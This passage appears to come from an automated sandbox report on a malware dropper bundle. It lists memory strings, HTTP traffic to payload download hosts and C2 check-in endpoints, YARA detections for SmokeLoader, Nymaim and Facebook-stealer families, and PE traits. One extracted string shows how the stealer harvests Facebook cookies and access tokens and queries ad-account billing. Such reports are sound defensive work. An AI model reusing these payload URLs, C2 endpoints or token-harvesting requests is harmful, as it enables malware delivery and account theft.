                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.654823744.000000000260C000.00000004.00000800.00020000.00000000.sdmp, 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.653019762.00000000025F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: T4IoJqcAwY.exe, 00000000.00000003.252388153.00000000039A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://d1lxhc4jvstzrp.cloudfront.net/themes/registrar/images/namecheap1.svg
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.654823744.000000000260C000.00000004.00000800.00020000.00000000.sdmp, 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.653019762.00000000025F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.654823744.000000000260C000.00000004.00000800.00020000.00000000.sdmp, 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.653019762.00000000025F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.654823744.000000000260C000.00000004.00000800.00020000.00000000.sdmp, 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.653019762.00000000025F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.651450658.000000000258A000.00000004.00000800.00020000.00000000.sdmp, 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.651650861.00000000025B5000.00000004.00000800.00020000.00000000.sdmp, 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.651496502.00000000025A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Nunito&display=swap
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.651450658.000000000258A000.00000004.00000800.00020000.00000000.sdmp, 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.651650861.00000000025B5000.00000004.00000800.00020000.00000000.sdmp, 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.651496502.00000000025A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
                    Source: 62829258f111c_8df26f0c7d.exe, 00000016.00000003.605107164.000000000599C000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.644989284.0000000005A61000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.647795129.00000000057ED000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.647716380.0000000005822000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g-cleanit.hk
                    Source: setup_install.exe, 00000005.00000000.266254158.00000000004A1000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://gcc.gnu.org/bugs/):
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.651650861.00000000025B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org
                    Source: 62829258f111c_8df26f0c7d.exe, 00000016.00000003.605107164.000000000599C000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.644989284.0000000005A61000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.647795129.00000000057ED000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.647716380.0000000005822000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1Pz8p7
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.649500041.0000000002451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1RaBg7
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.649500041.0000000002451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1RaBg7fMozilla/5.0
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.651650861.00000000025B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.orgx
                    Source: 62829252dc457_91e450cbce.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdline
                    Source: T4IoJqcAwY.exe, 00000000.00000003.252388153.00000000039A0000.00000004.00001000.00020000.00000000.sdmp, 62829252dc457_91e450cbce.exe, 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmpString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.654823744.000000000260C000.00000004.00000800.00020000.00000000.sdmp, 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.653019762.00000000025F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.654823744.000000000260C000.00000004.00000800.00020000.00000000.sdmp, 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.653019762.00000000025F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.654823744.000000000260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.654823744.000000000260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.654823744.000000000260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.654823744.000000000260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                    Source: T4IoJqcAwY.exe, 00000000.00000003.252388153.00000000039A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://trkpcy.net/track.
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.654823744.000000000260C000.00000004.00000800.00020000.00000000.sdmp, 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.653019762.00000000025F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: 62829252dc457_91e450cbce.exe, 00000010.00000003.277814438.0000000002600000.00000004.00001000.00020000.00000000.sdmp, 62829252dc457_91e450cbce.exe, 00000010.00000003.329044134.000000007FBA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.innosetup.com/
                    Source: T4IoJqcAwY.exe, 00000000.00000003.252388153.00000000039A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.namecheap.com
                    Source: 62829252dc457_91e450cbce.exe, 00000010.00000003.277814438.0000000002600000.00000004.00001000.00020000.00000000.sdmp, 62829252dc457_91e450cbce.exe, 00000010.00000003.329044134.000000007FBA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.remobjects.com/ps
                    Source: unknownDNS traffic detected: queries for: v.xyzgamev.com
                    Source: global trafficHTTP traffic detected: GET /23.html HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: v.xyzgamev.com
                    Source: global trafficHTTP traffic detected: GET /login.html HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: v.xyzgamev.com
                    Source: global trafficHTTP traffic detected: GET /1mhvg7 HTTP/1.1Cache-Control: no-cache, no-storeConnection: Keep-AlivePragma: no-cacheAccept: */*If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMTUser-Agent: ( Windows 10 Enterprise | x64 | Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz )Host: iplogger.org
                    Source: global trafficHTTP traffic detected: GET /ultimate/publish-gcdexh7kcw9xhrx4.exe HTTP/1.1Host: yuuichirou-hanma.s3.pl-waw.scw.cloudConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /ultimate/up-to-qqpuv99897uygdj2.exe HTTP/1.1Host: yuuichirou-hanma.s3.pl-waw.scw.cloud
                    Source: global trafficHTTP traffic detected: GET /Series/publisher/1/CH.json HTTP/1.1Host: connectini.netCache-Control: no-store,no-cachePragma: no-cache
                    Source: global trafficHTTP traffic detected: GET /ultimate/hand-uqc3q25p48egzty7.exe HTTP/1.1Host: yuuichirou-hanma.s3.pl-waw.scw.cloud
                    Source: global trafficHTTP traffic detected: GET /Series/kenpachi/2/goodchannel/CH.json HTTP/1.1Host: connectini.net
                    Source: global trafficHTTP traffic detected: GET /widgets/powerOff.exe HTTP/1.1Host: doja-cat.s3.pl-waw.scw.cloudConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /Series/configPoduct/2/goodchannel.json HTTP/1.1Host: connectini.net
                    Source: global trafficHTTP traffic detected: GET /ip/check.php?duplicate=kenpachi2_non-search_goodchannel_installrox2_EbookReader HTTP/1.1Host: connectini.net
                    Source: global trafficHTTP traffic detected: GET /1Nayx7 HTTP/1.1Host: iplogger.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_AdxpertMedia_IbottaIOS HTTP/1.1Host: connectini.net
                    Source: global trafficHTTP traffic detected: GET /S2S/Disc/Disc.php?ezok=pwoffch2&tesla=7 HTTP/1.1Host: connectini.net
                    Source: global trafficHTTP traffic detected: GET /1Rqjs7 HTTP/1.1Host: iplogger.org
                    Source: global trafficHTTP traffic detected: GET /1B6Bb7 HTTP/1.1Host: iplogger.org
                    Source: global trafficHTTP traffic detected: GET /1Xxky7 HTTP/1.1Host: iplogger.org
                    Source: global trafficHTTP traffic detected: GET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_handselfdiyWW HTTP/1.1Host: connectini.net
                    Source: global trafficHTTP traffic detected: GET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_TrueVpnWW HTTP/1.1Host: connectini.net
                    Source: global trafficHTTP traffic detected: GET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_HamperWW HTTP/1.1Host: connectini.net
                    Source: global trafficHTTP traffic detected: GET /2DiK57 HTTP/1.1Host: iplogger.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /25.html HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: v.xyzgamev.com
                    Source: global trafficHTTP traffic detected: GET /1tEnk7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Host: iplogger.orgCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /nunchucks/rec-fnpj3agqpa83jpen.exe HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36;Host: doja-cat.s3.pl-waw.scw.cloudConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /login.html HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: v.xyzgamev.com
                    Source: global trafficHTTP traffic detected: GET /1L7Vh7 HTTP/1.1Host: iplogger.org
                    Source: global trafficHTTP traffic detected: GET /2AqfG6 HTTP/1.1Host: iplogger.orgCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /1RaBg7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/515.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36Host: iplogger.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /1Pz8p7 HTTP/1.1User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Mobile/15E148 Safari/604.1Host: iplogger.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36Host: ip-api.com
                    Source: global trafficHTTP traffic detected: GET /adv-matrix/poweroff.exe HTTP/1.1Accept: */*User-Agent: InnoDownloadPlugin/1.5Host: cristaline.s3.pl-waw.scw.cloudConnection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GETData Raw: Data Ascii:
                    Source: global trafficHTTP traffic detected: GETData Raw: Data Ascii:
                    Source: global trafficHTTP traffic detected: GETData Raw: Data Ascii:
                    Source: global trafficHTTP traffic detected: GETData Raw: Data Ascii:
                    Source: global trafficHTTP traffic detected: GETData Raw: Data Ascii:
                    Source: global trafficHTTP traffic detected: GETData Raw: Data Ascii:
                    Source: global trafficHTTP traffic detected: GETData Raw: Data Ascii:
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                    Source: 6282925ab52f1_fdd12e5.exe, 00000018.00000002.389066130.00000001400DB000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36http://ip-api.com/json/":"countryCode"country_codemac0isinstall1uidckversionun_pwdc_userjazoest=dblnhttps://www.facebook.com//login/device-based/login/=""jazoest""lsd""uid""source"&lsd=&uid=&source=&next=https://www.facebook.com/login/device-based/login/cookieJsonhttps://www.facebook.com/ads/manager/account_settings/account_billingaccess_token:{accountID:payInfoaccountIdhttps://graph.facebook.com/v12.0/act_fb_uid?access_token=fb_access_token&_reqName=adaccount&_reqSrc=AdsCMPaymentsAccountDataDispatcher&fields=%5B%22active_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22can_pay_now%22%2C%22can_repay_now%22%2C%22current_unbilled_spend%22%2C%22extended_credit_info%22%2C%22is_br_entity_account%22%2C%22has_extended_credit%22%2C%22max_billing_threshold%22%2C%22min_billing_threshold%22%2C%22min_payment%22%2C%22next_bill_date%22%2C%22pending_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22promotion_progress_bar_info%22%2C%22show_improved_boleto%22%2C%22business%7Bid%2Cname%2Cpayment_account_id%7D%22%2C%22total_prepay_balance%22%2C%22is_in_3ds_authorization_enabled_market%22%2C%22current_unpaid_unrepaid_invoice%22%2C%22has_repay_processing_invoices%22%5D&include_headers=false&method=get&pretty=0&suppress_http_code=1fb_uidfb_access_tokencan_pay_nowhttps://graph.facebook.com/v12.0/me/adaccounts?access_token=fb_access_token&_reqName=me%2Fadaccounts&_reqSrc=AdsTypeaheadDataManager&fields=%5B%22account_id%22%2C%22account_status%22%2C%22is_direct_deals_enabled%22%2C%22business%7Bid%2Cname%7D%22%2C%22viewable_business%7Bid%2Cname%7D%22%2C%22name%22%5D&filtering=%5B%5D&include_headers=false&limit=100&method=get&pretty=0&sort=name_ascending&suppress_http_code=1"business"businessdataaccount_ididhttps://business.facebook.com/ads/manager/account_settings/account_billing/?act=fb_account_id&pid=p1&business_id=fb_business_id&page=account_settings&tab=account_billing_settingsfb_account_idfb_business_idhttps://graph.facebook.com/v12.0/act_fb_uid?access_token=fb_access_token&_priority=HIGH&_reqName=adaccount&_reqSrc=AdsCMAccountSpendLimitDataLoader&fields=%5B%22spend_cap%22%2C%22amount_spent%22%5D&include_headers=false&method=get&pretty=0&suppress_http_code=1amount_spentadtrustratiohttps://www.facebook.com/adsmanager/manage/campaigns?act=fb_idfb_id,:"account_currency_ratio_to_usd":"adtrust_dsl":"show_admined_pages":truehasHomePageofen_placetimeline_chromehttps://www.facebook.com/profile.php?id=c_user&sk=friendshref="<>"_gs6"}"items":{"count"friendsNumisLoginedcheck/safe{"sid":0,"time":0,"rand_str":""}check/?sid=sid#IO$J2&89DFJ2^984%7FJfj<>asi?h3.728*fhastimerand_str89%3gj,IH@<F7>84|j5kl3;4y:jdFJOhf01(92)3&key=invalid string position equals www.facebook.com (Facebook)
                    Source: 6282925ab52f1_fdd12e5.exe, 00000018.00000002.389066130.00000001400DB000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.facebook.com/adsmanager/manage/campaigns?act=fb_id equals www.facebook.com (Facebook)
                    Source: 6282925ab52f1_fdd12e5.exe, 00000018.00000002.389066130.00000001400DB000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.facebook.com/profile.php?id=c_user&sk=friends equals www.facebook.com (Facebook)
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.654823744.000000000260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: romium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-j
                    Source: unknownHTTP traffic detected: POST /Series/SuperNitouDisc.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: connectini.netContent-Length: 51Expect: 100-continueConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 172.67.188.70:443 -> 192.168.2.4:49758 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.40.196:443 -> 192.168.2.4:49764 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Yara detected SmokeLoader
                    Source: Yara matchFile source: 18.2.62829254ab49d_fc210c4a.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.3.62829254ab49d_fc210c4a.exe.2cf0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.2.62829254ab49d_fc210c4a.exe.2ce0e67.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000012.00000002.555317118.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.555585024.0000000002D21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002B.00000000.512324401.0000000002741000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.315223819.0000000002CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: T4IoJqcAwY.exe, 00000000.00000002.289658895.00000000006EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_0040A579 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,14_2_0040A579
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                    E-Banking Fraud

                    barindex
                    Yara detected Nymaim
                    Source: Yara matchFile source: 22.3.62829258f111c_8df26f0c7d.exe.4810000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.2d10e67.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.2d10e67.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.400000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.400000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.2d10e67.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.2d10e67.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.400000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.400000.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.2d10e67.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.2d10e67.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.2d10e67.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.2d10e67.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.0.62829258f111c_8df26f0c7d.exe.400000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000016.00000000.329990024.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000000.333254439.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000000.332457104.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000000.373439148.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000003.319416057.0000000004810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000000.367298393.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000000.336022265.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000000.369246590.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000000.371676239.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 00000033.00000002.429034900.0000000004640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Fabookie / ElysiumStealer Author: ditekSHen
                    Source: 00000033.00000002.429034900.0000000004640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
                    Source: 00000038.00000000.390207801.000001F05C9B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
                    Source: 0000001F.00000002.351468140.0000000000400000.00000040.00000001.01000000.00000012.sdmp, type: MEMORYMatched rule: Detects OnlyLogger loader variants Author: ditekSHen
                    Source: 00000038.00000002.758366144.000001F05CAA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
                    Source: 00000038.00000002.758120668.000001F05C9B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
                    Source: 00000033.00000002.428755531.00000000045E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Fabookie / ElysiumStealer Author: ditekSHen
                    Source: 0000001F.00000003.328543669.00000000047D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects OnlyLogger loader variants Author: ditekSHen
                    PE file has a writeable .text section
                    Source: libstdc++-6.dll.0.drStatic PE information: Section: .text IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_CNT_CODE, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                    PE file contains section with special chars
                    Source: 6282924fea1c3_82ebfc59.exe.0.drStatic PE information: section name: JM`(q
                    Detected VMProtect packer
                    Source: 6282925ab52f1_fdd12e5.exe.0.drStatic PE information: .vmp0 and .vmp1 section names
                    PE file has nameless sections
                    Source: 6282924fea1c3_82ebfc59.exe.0.drStatic PE information: section name:
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4516 -s 548
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeCode function: 0_2_0040BD850_2_0040BD85
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeCode function: 0_2_004031010_2_00403101
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeCode function: 0_2_004101380_2_00410138
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeCode function: 0_2_004192A10_2_004192A1
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeCode function: 0_2_0041937B0_2_0041937B
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeCode function: 0_2_00416C700_2_00416C70
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeCode function: 0_2_00413ED00_2_00413ED0
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeCode function: 0_2_00417F4E0_2_00417F4E
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_004420E05_2_004420E0
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_0043E0B05_2_0043E0B0
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_004103B05_2_004103B0
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_0044E5405_2_0044E540
